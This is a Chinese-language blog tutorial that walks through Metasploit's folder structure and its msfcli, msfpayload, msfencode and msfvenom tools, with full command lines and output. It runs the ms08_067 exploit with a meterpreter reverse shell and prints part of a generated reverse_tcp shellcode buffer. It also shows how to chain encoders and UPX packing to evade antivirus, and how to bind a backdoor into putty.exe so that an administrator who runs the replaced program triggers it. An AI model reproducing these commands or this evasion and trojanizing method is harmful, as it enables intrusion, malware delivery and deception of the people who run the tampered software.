metasploit的模块构成及功能分析

metasploit的模块构成及功能分析
今天我们介绍一下metasploit的基础架构和
市面上介绍metasploit的书不少,网上metasploit的使用说明的文章更是满天飞,可是没有哪一本书或者哪一篇文章来介绍metasploit的目录结构和他的功能,今天我们就来介绍一下metasploit的文件结构和每个部分的功能以及参数。

exploit@ubuntu:/pentest/framework3$ ls
CONTRIBUTING.md README.md data metasploit-framework-db.gemspec msfconsole msfrop putty.exe
COPYING Rakefile db metasploit-framework-full.gemspec msfd msfrpc script
Gemfile a.exe documentation metasploit-framework-pcap.gemspec msfelfscan msfrpcd scripts
Gemfile.local.example app external metasploit-framework.gemspec msfencode msfupdate spec
Gemfile.lock av.exe features modules msfmachscan msfvenom test
HACKING back.pl lib msfbinscan msfpayload payload.exe tools
LICENSE config log msfcli msfpescan plugins

通过以上我们可以看到metasploit的基本为文件结构
config --metasploit的环境配置信息,数据库配置信息
data--后渗透模块的一些工具及payload,第三方小工具集合,用户字典等数据信息
db--rails编译生成msf的web框架时的数据库信息
documentation--用户说明文档及开发文档
external--metasploit的一些基础扩展模块
libs--metasploit的一些基础类和第三方模块类
log--msf运行时的一些系统信息和其他信息
modules--metasploit的系统工具模块,包括预辅助模块(auxiliary),渗透模块(exploits),攻击荷载(payloads)和后渗透模块(posts),以及空字段模块(nops)和编码模块(Encoders)
msfbinscan--对bin文件进行文件偏移地址扫描
msfcli--metasploit命令行模式,可以快速调用有效的payload进行攻击,新版本的metasploit即将在2015年6月18日弃用
msfconsole--metasploit的基本命令行,集成了各种功能。
msfd--metasploit服务,非持久性服务
msfelfscan--对linux的elf文件偏移地址进行扫描
msfencode--metasploit的编码模块,可以对mepayload和shellcode进行编码输出
msfpayload--metasploit攻击荷载,用以调用不同的攻击荷载,生成和输出不同格式的shellocode,新版本的metasploit即将在2015年6月18日弃用,用msfvenmon替代。
msfmachscan--功能同msfelfscan
msfpescan--对windows的pe格式文件偏移地址进行扫描
msfrop--对windows的pe进行文件地址偏移操作,可以绕过alsr等
msfrpc--metasploit的服务端,非持久性的rpc服务
msfrpcd--持久性的metasploit本地服务,可以给远程用户提供rpc服务以及其他的http服务,可以通过xml进行数据传输。
msfupdate--metasploit更新模块,可以用来更新metasploit模块
msfvenom--集成了msfpayload和msfencode的功能,效率更高,即将替代msf payload和msfencode
plugins--metasploit的第三方插件接口
scripts--metasplit的常用后渗透模块,区别于data里的后渗透模块,不需要加post参数和绝对路径,可以直接运行
test--metasploit的基本测试目录
tools--额外的小工具和第三方脚本工具

下面我们对这些常用命令的用法做一些解释
msfcli 虽然和msfconsole一样同为命令行界面,但是他不提供交互的命令行模式,直接通过命令行执行输出结果,直接调用辅助模块和攻击模块对目标进行渗透攻击,更为高效便捷。
exploit@ubuntu:/pentest/framework3$ msfcli -h

[!] ************************************************************************

[!] * The utility msfcli is deprecated! *

[!] * It will be removed on or about 2015-06-18 *

[!] * Please use msfconsole -r or -x instead *

[!] * Details: https://github.com/rapid7/metasploit-framework/pull/3802 *

[!] ************************************************************************

Usage: /usr/local/bin/msfcli [mode]

=================================================================

Mode Description

—- ———–

(A)dvanced Show available advanced options for this module #显示该模块的高级选项

(AC)tions Show available actions for this module #显示该模块的详细设置操作选项

(C)heck Run the check routine of the selected module #运行选择的模块进行检测

(E)xecute Execute the selected module #执行选择的模块

(H)elp You’re looking at it baby! #显示msfcli的帮助信息

(I)DS Evasion Show available ids evasion options for this module #显示该模块的ids

(M)issing Show empty required options for this module #查看必须的操作选项有哪些没有设置

(O)ptions Show available options for this module #查看可用的选项

(P)ayloads Show available payloads for this module #查看模块可用的payload模块

(S)ummary Show information about this module #显示该模块的详细信息

(T)argets Show available targets for this exploit module #显示该溢出模块针对的目标类型

Examples:

msfcli multi/handler payload=windows/meterpreter/reverse_tcp lhost=IP E

msfcli auxiliary/scanner/http/http_version rhosts=IP encoder= post= nop= E

这里我们就msfcli的一些具体的参数来解释:

最常见的用法就是利用metasploit的辅助模块和攻击模块对目标进行操作

这里我们针对http_version的模块选项进行显示,查看有哪些操作选项。

exploit@ubuntu:/pentest/framework3$ msfcli auxiliary/scanner/http/http_version rhost=106.186.118.91 O
[!] ************************************************************************
[!] * The utility msfcli is deprecated! *
[!] * It will be removed on or about 2015-06-18 *
[!] * Please use msfconsole -r or -x instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/3802 *
[!] ************************************************************************
[*] Initializing modules…

Name Current Setting Required Description
—- ————— ——– ———–
Proxies no Use a proxy chain
RHOSTS yes The target address range or CIDR identifier
RPORT 80 yes The target port
THREADS 1 yes The number of concurrent threads
VHOST no HTTP server virtual host

exploit@ubuntu:/pentest/framework3$ msfcli exploits/windows/smb/ms08_067_netapi P
这里会显示针对ms08_067可以使用的payload的信息,我们可以根据我们的系统平台环境和网络环境进行选择。

exploit@ubuntu:/pentest/framework3$ msfcli exploits/windows/smb/ms08_067_netapi P
显示08067的操作高级属性,这样在有针对性的针对某些版本溢出时,可以达到更好的效果
exploit@ubuntu:/pentest/framework3$ msfcli exploits/windows/smb/ms08_067_netapi P
[!] ************************************************************************
[!] * The utility msfcli is deprecated! *
[!] * It will be removed on or about 2015-06-18 *
[!] * Please use msfconsole -r or -x instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/3802 *
[!] ************************************************************************
[*] Initializing modules...

Compatible payloads
===================

Name Description
---- -----------
generic/custom Use custom string or file as payload. Set either PAYLOADFILE or
PAYLOADSTR.
generic/debug_trap Generate a debug trap in the target process
generic/shell_bind_tcp Listen for a connection and spawn a command shell
generic/shell_reverse_tcp Connect back to attacker and spawn a command shell
generic/tight_loop Generate a tight loop in the target process
windows/dllinject/bind_hidden_ipknock_tcp Inject a DLL via a reflective loader. Listen for a connection. First, the port will need to be knocked from
the IP defined in KHOST. This IP will work as an authentication method
(you can spoof it with tools like hping). After that you could get your
shellcode from any IP. The socket will appear as "closed" helping us to
hide the shellcode
windows/dllinject/bind_hidden_tcp Inject a DLL via a reflective loader. Listen for a connection from a hidden port and spawn a command shell to the allowed host
windows/dllinject/bind_ipv6_tcp Inject a DLL via a reflective loader. Listen for a connection over IPv6
windows/dllinject/bind_nonx_tcp Inject a DLL via a reflective loader. Listen for a connection (No NX)
windows/dllinject/bind_tcp Inject a DLL via a reflective loader. Listen for a connection
windows/dllinject/bind_tcp_rc4 Inject a DLL via a reflective loader. Listen for a connection
windows/dllinject/reverse_hop_http Inject a DLL via a reflective loader. Tunnel communication over an HTTP hop point. Note that you must first upload

exploit@ubuntu:/pentest/framework3$ msfcli exploit/windows/smb/ms08_067_netapi M

M参数显示正在使用的模块有哪些必须的参数没有设置,操作我们可以发现,需要设置远程的服务器ip
exploit@ubuntu:/pentest/framework3$ msfcli exploit/windows/smb/ms08_067_netapi M
[!] ************************************************************************
[!] * The utility msfcli is deprecated! *
[!] * It will be removed on or about 2015-06-18 *
[!] * Please use msfconsole -r or -x instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/3802 *
[!] ************************************************************************
[*] Initializing modules...

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address

msfcli auxiliary/scanner/http/http_version rhosts=IP encoder= post= nop= E

E 参数,是执行当前的选择的模块,如下图,我们选择http服务版本探测,设置好参数,加上E参数,执行当前模块

msfcli的另外一个参数是t,这里是选择我们针对的远程目标的版本的选择,如下图,我们可以选择合适的目标来进行远程溢出

exploit@ubuntu:/pentest/framework3$ msfcli exploits/windows/smb/ms08_067_netapi t
[!] ************************************************************************
[!] * The utility msfcli is deprecated! *
[!] * It will be removed on or about 2015-06-18 *
[!] * Please use msfconsole -r or -x instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/3802 *
[!] ************************************************************************
[*] Initializing modules...

Id Name
-- ----
0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows 2003 SP0 Universal
4 Windows XP SP2 English (AlwaysOn NX)
5 Windows XP SP2 English (NX)
6 Windows XP SP3 English (AlwaysOn NX)
7 Windows XP SP3 English (NX)
8 Windows XP SP2 Arabic (NX)
9 Windows XP SP2 Chinese - Traditional / Taiwan (NX)
10 Windows XP SP2 Chinese - Simplified (NX)
11 Windows XP SP2 Chinese - Traditional (NX)
12 Windows XP SP2 Czech (NX)
13 Windows XP SP2 Danish (NX)
14 Windows XP SP2 German (NX)
15 Windows XP SP2 Greek (NX)
16 Windows XP SP2 Spanish (NX)
17 Windows XP SP2 Finnish (NX)
18 Windows XP SP2 French (NX)
19 Windows XP SP2 Hebrew (NX)
20 Windows XP SP2 Hungarian (NX)
21 Windows XP SP2 Italian (NX)
22 Windows XP SP2 Japanese (NX)
23 Windows XP SP2 Korean (NX)
24 Windows XP SP2 Dutch (NX)
25 Windows XP SP2 Norwegian (NX)
26 Windows XP SP2 Polish (NX)
27 Windows XP SP2 Portuguese - Brazilian (NX)
28 Windows XP SP2 Portuguese (NX)
29 Windows XP SP2 Russian (NX)
30 Windows XP SP2 Swedish (NX)
31 Windows XP SP2 Turkish (NX)
32 Windows XP SP3 Arabic (NX)
33 Windows XP SP3 Chinese - Traditional / Taiwan (NX)
34 Windows XP SP3 Chinese - Simplified (NX)
35 Windows XP SP3 Chinese - Traditional (NX)
36 Windows XP SP3 Czech (NX)
37 Windows XP SP3 Danish (NX)
38 Windows XP SP3 German (NX)
39 Windows XP SP3 Greek (NX)
40 Windows XP SP3 Spanish (NX)
41 Windows XP SP3 Finnish (NX)
42 Windows XP SP3 French (NX)
43 Windows XP SP3 Hebrew (NX)
44 Windows XP SP3 Hungarian (NX)
45 Windows XP SP3 Italian (NX)
46 Windows XP SP3 Japanese (NX)
47 Windows XP SP3 Korean (NX)
48 Windows XP SP3 Dutch (NX)
49 Windows XP SP3 Norwegian (NX)
50 Windows XP SP3 Polish (NX)
51 Windows XP SP3 Portuguese - Brazilian (NX)
52 Windows XP SP3 Portuguese (NX)
53 Windows XP SP3 Russian (NX)
54 Windows XP SP3 Swedish (NX)
55 Windows XP SP3 Turkish (NX)
56 Windows 2003 SP1 English (NO NX)
57 Windows 2003 SP1 English (NX)
58 Windows 2003 SP1 Japanese (NO NX)
59 Windows 2003 SP1 Spanish (NO NX)
60 Windows 2003 SP1 Spanish (NX)
61 Windows 2003 SP2 English (NO NX)
62 Windows 2003 SP2 English (NX)
63 Windows 2003 SP2 German (NO NX)
64 Windows 2003 SP2 German (NX)
65 Windows 2003 SP2 Portuguese - Brazilian (NX)
66 Windows 2003 SP2 Spanish (NO NX)
67 Windows 2003 SP2 Spanish (NX)
68 Windows 2003 SP2 Japanese (NO NX)

根据上面的介绍,我们来对目标ip通过ms08_067_netapi进行远程攻击,参数设置如下

exploit@ubuntu:/pentest/framework3$ msfcli exploits/windows/smb/ms08_067_netapi RHOST=192.168.1.168 PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=5546 E
[!] ************************************************************************
[!] * The utility msfcli is deprecated! *
[!] * It will be removed on or about 2015-06-18 *
[!] * Please use msfconsole -r or -x instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/3802 *
[!] ************************************************************************
[*] Initializing modules...
RHOST => 192.168.1.168
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.10
LPORT => 5546
[-] Handler failed to bind to 192.168.1.10:5546
[*] Started reverse handler on 0.0.0.0:5546

下面我们介绍我们会经常用到的一个参数,msfpayload,执行msfpayload -h,帮助文件显示的似乎很简单,我们对每个参数的功能做详细的介绍:

exploit@ubuntu:/pentest/framework3$ msfpayload -h
[!] ************************************************************************
[!] * The utility msfpayload is deprecated! *
[!] * It will be removed on or about 2015-06-08 *
[!] * Please use msfvenom instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
[!] ************************************************************************

Usage: /usr/local/bin/msfpayload [] [var=val] <[S]ummary|C|Cs[H]arp|[P]erl|Rub[Y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar|Pytho[N]|s[O]>

OPTIONS:

-h Help banner
-l List available payloads

msfpayload 操作选项 payload模块 变量定义 生成的文件格式,目前支持的格式有:C代码,C#代码,perl代码,ruby代码,Raw文件流,Js代码,exe文件,dll文件,vba文件,War文件,apk文件,python文件,

如,我们想生成一个通过反弹tcp端口的perl文件格式的payload,那么我们执行以下操作

exploit@ubuntu:/pentest/framework3$ msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.106 LPORT=5546 P >back.pl[!] ************************************************************************
[!] * The utility msfpayload is deprecated! *
[!] * It will be removed on or about 2015-06-08 *
[!] * Please use msfvenom instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
[!] ************************************************************************

ok接下来我们查看该文件是否生成,文件内容是什么

exploit@ubuntu:/pentest/framework3$ head -n 20 back.pl
# windows/meterpreter/reverse_tcp - 281 bytes (stage 1)
# http://www.metasploit.com
# VERBOSE=false, LHOST=192.168.1.106, LPORT=5546,
# ReverseConnectRetries=5, ReverseListenerBindPort=0,
# ReverseAllowProxy=false, ReverseListenerThreaded=false,
# EnableStageEncoding=false, StageEncoderSaveRegisters=,
# StageEncodingFallback=true, PrependMigrate=false,
# EXITFUNC=process, AutoLoadStdapi=true,
# InitialAutoRunScript=, AutoRunScript=, AutoSystemInfo=true,
# EnableUnicodeEncoding=true
my $buf =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50" .
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" .
"\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7" .
"\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78" .
"\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3" .
"\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01" .
"\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58" .
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3" .
"\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a" .

这里我们可以看到在当前目录生成了back.pl,查看perl文件内容,可以看到,反弹的ip地址是192.168.1.106,反弹的端口是5546,重试的次数是5次,允许加密,下面是执行反弹的shellcode代码

这里我们只是举了一个简单的例子,同样,如果我不知道有哪些payload可以提供给我们使用,那么我们只需要执行

exploit@ubuntu:/pentest/framework3$ msfpayload -l
[!] ************************************************************************
[!] * The utility msfpayload is deprecated! *
[!] * It will be removed on or about 2015-06-08 *
[!] * Please use msfvenom instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
[!] ************************************************************************

Framework Payloads (356 total)
==============================

Name Description
---- -----------
aix/ppc/shell_bind_tcp Listen for a connection and spawn a command shell
aix/ppc/shell_find_port Spawn a shell on an established connection
aix/ppc/shell_interact Simply execve /bin/sh (for inetd programs)
aix/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell
android/meterpreter/reverse_http Run a meterpreter server on Android. Tunnel communication over HTTP
android/meterpreter/reverse_https Run a meterpreter server on Android. Tunnel communication over HTTPS
android/meterpreter/reverse_tcp Run a meterpreter server on Android. Connect back stager
android/shell/reverse_http Spawn a piped command shell (sh). Tunnel communication over HTTP
android/shell/reverse_https Spawn a piped command shell (sh). Tunnel communication over HTTPS
…………

这样就会列出所有的payload

由于payoad类型太多,我们不知道如何选择适合自己的平台的payload,比如我们需要android平台下的payload,那么我们只需要执行以下命令

exploit@ubuntu:/pentest/framework3$ msfpayload -l| grep android
[!] ************************************************************************
[!] * The utility msfpayload is deprecated! *
[!] * It will be removed on or about 2015-06-08 *
[!] * Please use msfvenom instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
[!] ************************************************************************
android/meterpreter/reverse_http Run a meterpreter server on Android. Tunnel communication over HTTP
android/meterpreter/reverse_https Run a meterpreter server on Android. Tunnel communication over HTTPS
android/meterpreter/reverse_tcp Run a meterpreter server on Android. Connect back stager
android/shell/reverse_http Spawn a piped command shell (sh). Tunnel communication over HTTP
android/shell/reverse_https Spawn a piped command shell (sh). Tunnel communication over HTTPS
android/shell/reverse_tcp Spawn a piped command shell (sh). Connect back stager

这样所有的android平台下的payload都可以查找出来了,再根据我们的系统平台环境和网络环境选择合适的payload。

有了合适的payload,但是我不知道需要设置哪些参数,那么我们就需要执行下面的参数,这样根据系统提示,我们可以进行我们下一步的操作
exploit@ubuntu:/pentest/framework3$ msfpayload android/meterpreter/reverse_tcp s
[!] ************************************************************************
[!] * The utility msfpayload is deprecated! *
[!] * It will be removed on or about 2015-06-08 *
[!] * Please use msfvenom instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
[!] ************************************************************************

Name: Android Meterpreter, Dalvik Reverse TCP Stager
Module: payload/android/meterpreter/reverse_tcp
Platform: Android
Arch: dalvik
Needs Admin: No
Total size: 8053
Rank: Normal

Provided by:
mihi
egypt 
anwarelmakrahy
timwr

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadAndroid true yes Automatically load the Android extension
LHOST 192.168.189.134 yes The listen address
LPORT 4444 yes The listen port
RetryCount 10 yes Number of trials to be made if connection failed

Description:
Run a meterpreter server on Android. Connect back stager

这样会提示我们需要设置哪些参数,如LHOST,LPORT,是否自动加载,重试连接次数,这样我们就知道下一步如何对我们的payload进行设置操作

这样我们就生成了android平台的apk后门文件,由于msfpayload可以生成不同平台,不同语言的payload,所以在渗透的时候,我们可以根据目标系统的环境,和网络环境,选择我们合适的payload和生成的文件格式。

接下来,我们继续介绍metasploit的另外一个比较重要的参数msfencode的用法

exploit@ubuntu:/pentest/framework3$ msfencode -h
[!] ************************************************************************
[!] * The utility msfencode is deprecated! *
[!] * It will be removed on or about 2015-06-08 *
[!] * Please use msfvenom instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
[!] ************************************************************************

Usage: /usr/local/bin/msfencode

OPTIONS:

-a The architecture to encode as
-b The list of characters to avoid: '\x00\xff'
-c The number of times to encode the data
-d Specify the directory in which to look for EXE templates
-e The encoder to use
-h Help banner
-i Encode the contents of the supplied file path
-k Keep template working; run payload in new thread (use with -x)
-l List available encoders
-m Specifies an additional module search path
-n Dump encoder information
-o The output file
-p The platform to encode for
-s The maximum size of the encoded data
-t The output format: bash,c,csharp,dw,dword,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,dll,elf,elf-so,exe,exe-only,exe-service,exe-small,loop-vbs,macho,msi,msi-nouac,osx-app,psh,psh-net,psh-reflection,vba,vba-exe,vbs,war
-v Increase verbosity
-x Specify an alternate executable template

这里我们就其参数做一一介绍:

-a 指定CPU 的类型,
-b 指定需要去除的字符,帮助中的示例00 ff 这两种数值在网络传送中会被截断造成传送失败
-c 指定编码次数,
-d 指定exe模板搜索路径,
-i 指定要编码的数据文件
-k 设置生成的文件运行后的payload进程与模板文件进程分离。
-l 列出可用payload
-n 输出编码器信息
-o 输出文件
-p 指定编码平台

-s 指定编码后的字节数(payload的)

-t 加密后文件的输出格式,支持以下格式:bash,c,c#,dword,java,js_be,js_le,数字型(num),perl文件,pl后缀文件,powershell格式文件,ps1格式文件,py,python,raw,rb,ruby,sh,vbapplaction,vbscript,asp,aspx,aspx-exe,dll,elf,elf-so,exe,exe-only,exe-service,exe-small.loop-vbs.macho,msi,msi_nouac,osx-app,psh,psh-net,psh-reflection,vba,vba-exe,war

-v 显示当前msfencode的版本信息

-x 指定一个备用的可执行文件模版

msfencode可以对我们的payload进行加密,一般是和msfpayload配合使用,当然,也可以单独对已有的文件模版进行加密,支持多种文件格式,并且支持多种加密方式,这里我们先看看msfencode支持哪些类型的加密方式

exploit@ubuntu:/pentest/framework3$ msfencode -l
[!] ************************************************************************
[!] * The utility msfencode is deprecated! *
[!] * It will be removed on or about 2015-06-08 *
[!] * Please use msfvenom instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
[!] ************************************************************************

Framework Encoders
==================

Name Rank Description
---- ---- -----------
cmd/echo good Echo Command Encoder
cmd/generic_sh manual Generic Shell Variable Substitution Command Encoder
cmd/ifs low Generic ${IFS} Substitution Command Encoder
cmd/perl normal Perl Command Encoder
cmd/powershell_base64 excellent Powershell Base64 Command Encoder
cmd/printf_php_mq manual printf(1) via PHP magic_quotes Utility Command Encoder
generic/eicar manual The EICAR Encoder
generic/none normal The "none" Encoder
mipsbe/byte_xori normal Byte XORi Encoder
mipsbe/longxor normal XOR Encoder
mipsle/byte_xori normal Byte XORi Encoder
mipsle/longxor normal XOR Encoder
php/base64 great PHP Base64 Encoder
ppc/longxor normal PPC LongXOR Encoder
ppc/longxor_tag normal PPC LongXOR Encoder
sparc/longxor_tag normal SPARC DWORD XOR Encoder
x64/xor normal XOR Encoder
x86/add_sub manual Add/Sub Encoder
x86/alpha_mixed low Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper low Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_underscore_tolower manual Avoid underscore/tolower
x86/avoid_utf8_tolower manual Avoid UTF8/tolower
x86/bloxor manual BloXor - A Metamorphic Block Based XOR Encoder
x86/call4_dword_xor normal Call+4 Dword XOR Encoder
x86/context_cpuid manual CPUID-based Context Keyed Payload Encoder
x86/context_stat manual stat(2)-based Context Keyed Payload Encoder
x86/context_time manual time(2)-based Context Keyed Payload Encoder
x86/countdown normal Single-byte XOR Countdown Encoder
x86/fnstenv_mov normal Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive normal Jump/Call XOR Additive Feedback Encoder
x86/nonalpha low Non-Alpha Encoder
x86/nonupper low Non-Upper Encoder
x86/opt_sub manual Sub Encoder (optimised)
x86/shikata_ga_nai excellent Polymorphic XOR Additive Feedback Encoder
x86/single_static_bit manual Single Static Bit
x86/unicode_mixed manual Alpha2 Alphanumeric Unicode Mixedcase Encoder x86/unicode_upper manual Alpha2 Alphanumeric Unicode Uppercase Encoder

上面列出了可以用的加密格式和等级,还是要根据我们系统的安全级别,杀毒软件以及其他防护软件来选择我们合适的加密方式以便绕过这些限制措施。空谈误国,我们还是看看实际的操作。
首先,在我的本地有个a.exe,是我们其他工具生成的木马服务端,由于需要免杀,有没有专门做免杀的程序狗和逆向狗,没事,自己动手丰衣足食,用msfencode来解决你的困扰。

我们用msfpayload来生成一个反弹的程序,通过msfencode来进行加密,规避杀毒软件的查杀。
exploit@ubuntu:/pentest/framework3$ msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 7 -t exe -o payload.exe
[!] ************************************************************************
[!] * The utility msfencode is deprecated! *
[!] * It will be removed on or about 2015-06-08 *
[!] * Please use msfvenom instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
[!] ************************************************************************
[!] ************************************************************************
[!] * The utility msfpayload is deprecated! *
[!] * It will be removed on or about 2015-06-08 *
[!] * Please use msfvenom instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
[!] ************************************************************************
[*] x86/shikata_ga_nai succeeded with size 308 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 335 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 362 (iteration=3)

[*] x86/shikata_ga_nai succeeded with size 389 (iteration=4)

[*] x86/shikata_ga_nai succeeded with size 416 (iteration=5)

[*] x86/shikata_ga_nai succeeded with size 443 (iteration=6)

[*] x86/shikata_ga_nai succeeded with size 470 (iteration=7)

当然,这里只用了一种加密方式,经过了7次加密,也可以采用多种加密方式的多重加密,这样大部分的杀毒软件都变哑巴了

exploit@ubuntu:/pentest/framework3$ msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 7 -t raw | msfencode -e x86/bloxor -c 3 -t raw | msfencode -e x86/countdown -c 5 -t exe -o av.exe
[!] ************************************************************************[!] ************************************************************************[!] ************************************************************************
[!] * The utility msfencode is deprecated! *
[!] * It will be removed on or about 2015-06-08 *
[!] * Please use msfvenom instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
[!] ************************************************************************

[!] * The utility msfencode is deprecated! *
[!] * It will be removed on or about 2015-06-08 *
[!] * Please use msfvenom instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
[!] ************************************************************************

[!] * The utility msfpayload is deprecated! *
[!] * It will be removed on or about 2015-06-08 *
[!] * Please use msfvenom instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
[!] ************************************************************************
[!] ************************************************************************
[!] * The utility msfencode is deprecated! *
[!] * It will be removed on or about 2015-06-08 *
[!] * Please use msfvenom instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
[!] ************************************************************************
[*] x86/shikata_ga_nai succeeded with size 308 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 335 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 362 (iteration=3)

[*] x86/shikata_ga_nai succeeded with size 389 (iteration=4)

[*] x86/shikata_ga_nai succeeded with size 416 (iteration=5)

[*] x86/shikata_ga_nai succeeded with size 443 (iteration=6)

[*] x86/shikata_ga_nai succeeded with size 470 (iteration=7)

[*] x86/bloxor succeeded with size 547 (iteration=1)

[*] x86/bloxor succeeded with size 617 (iteration=2)

[*] x86/bloxor succeeded with size 677 (iteration=3)

[*] x86/countdown succeeded with size 695 (iteration=1)

[*] x86/countdown succeeded with size 713 (iteration=2)

[*] x86/countdown succeeded with size 731 (iteration=3)

[*] x86/countdown succeeded with size 749 (iteration=4)

[*] x86/countdown succeeded with size 767 (iteration=5)

最后生成av.exe,这里我们可以测试一下生成的exe是否可以正常运行,丢到windows里面运行一下,请自行测试,我就不截图了。

如果运行正常,还不放心杀毒软件会干掉,那么我们再用upx加个壳?

exploit@ubuntu:/pentest/framework3$ upx -5 av.exe
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2013
UPX 3.91 Markus Oberhumer, Laszlo Molnar & John Reiser Sep 30th 2013

File size Ratio Format Name
-------------------- ------ ----------- -----------
73802 -> 48128 65.21% win32/pe av.exe

Packed 1 file.

这种的生成的payload运行之后,没有什么反应,如果是作为渗透者自己来用的话,可能会做的比较隐蔽,有时候我们需要管理员或者目标主机上的其他人来触发这些payload程序,那么我们就需要用到比较隐蔽和猥琐的触发方式了,用标准的官方语言说就是:建立以标准文件模版为基础的payload文件,通俗点说就是搞个捆绑器,把shellcode我们正常的程序捆绑在一起,当管理员运行正常程序的时,就会触发我们的payload后门
a.exe是一个正常的putty程序,我们把shellcode和putty捆绑在一起生成一个新的程序

exploit@ubuntu:/pentest/framework3$ msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.68 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -c 3 -t exe -k -x /pentest/framework3/a.exe -o putty.exe
[!] ************************************************************************[!] ************************************************************************
[!] * The utility msfpayload is deprecated! *
[!] * It will be removed on or about 2015-06-08 *
[!] * Please use msfvenom instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
[!] ************************************************************************

[!] * The utility msfencode is deprecated! *
[!] * It will be removed on or about 2015-06-08 *
[!] * Please use msfvenom instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
[!] ************************************************************************
[*] x86/shikata_ga_nai succeeded with size 308 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 335 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 362 (iteration=3)

可以看到我们生成了新的putty.exe,只需要替换掉原来的putty.exe即可,当管理员运行我们加工后的putty.exe时,就会触发我们的后门。

前面提到了,我们要对原本已经有的,比如通过其他的木马生成器生成的木马服务端进行免杀,那我们同样可以使用这样的模式来进行免杀,看实际的操作例子,这里的a是我们原始的putty文件,payload是我们生成的木马服务端,通过捆绑免杀,生成新的putty.exe
exploit@ubuntu:/pentest/framework3$ msfencode -i /pentest/framework3/payload.exe -e x86/shikata_ga_nai -c 5 -x -k /pentest/framework3/a.exe -o putty.exe
[!] ************************************************************************
[!] * The utility msfencode is deprecated! *
[!] * It will be removed on or about 2015-06-08 *
[!] * Please use msfvenom instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
[!] ************************************************************************
[*] x86/shikata_ga_nai succeeded with size 73831 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 73860 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 73889 (iteration=3)

[*] x86/shikata_ga_nai succeeded with size 73918 (iteration=4)

[*] x86/shikata_ga_nai succeeded with size 73947 (iteration=5)

接下来介绍msfvenom,msfvenom兼顾了msfencode和msfpayload的功能,所以将逐步替代msfencode和msfpayload,先看下参数

exploit@ubuntu:/pentest/framework3$ msfvenom -h
Usage: /usr/local/bin/msfvenom [options]

Options:
-p, --payload Payload to use. Specify a '-' or stdin to use custom payloads
-l, --list [module_type] List a module type example: payloads, encoders, nops, all
-n, --nopsled Prepend a nopsled of [length] size on to the payload
-f, --format
Output format (use --help-formats for a list)
-e, --encoder [encoder] The encoder to use
-a, --arch The architecture to use
--platform The platform of the payload
-s, --space The maximum size of the resulting payload
-b, --bad-chars The list of characters to avoid example: '\x00\xff'
-i, --iterations The number of times to encode the payload
-c, --add-code Specify an additional win32 shellcode file to include
-x, --template Specify a custom executable file to use as a template
-k, --keep Preserve the template behavior and inject the payload as a new thread
--payload-options List the payload's standard options
-o, --out Save the payload
-v, --var-name Specify a custom variable name to use for certain output formats
-h, --help Show this message
